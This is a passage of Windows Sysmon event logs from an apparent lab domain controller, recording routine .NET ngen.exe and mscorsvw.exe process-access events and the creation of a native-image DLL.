C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:39.918","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-00105CA01000}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7522,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:39.918\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-00105CA01000}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:39.918","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-00105CA01000}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7523,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:39.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-00105CA01000}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:39.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-00105CA01000}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7524,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:39.981\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-0010EFA31000}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:39.981","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-0010EFA31000}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7525,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:39.981\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-0010EFA31000}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:39.981","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-0010EFA31000}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7526,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:39.981\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-0010EFA31000}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:39.981","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-0010EFA31000}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7527,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:40.137\r\nProcessGuid: {A837DB8D-04CB-5F25-0000-0010EFA31000}\r\nProcessId: 3000\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\System.IdentityModel.Selectors.dll\r\nCreationUtcTime: 2020-08-01 05:59:40.137","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:40.137","ProcessGuid":"{A837DB8D-04CB-5F25-0000-0010EFA31000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\System.IdentityModel.Selectors.dll","CreationUtcTime":"2020-08-01 05:59:40.137","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7528,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.168\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-00108CA91000}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.168","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-00108CA91000}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7529,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.168\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-00108CA91000}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.168","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-00108CA91000}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
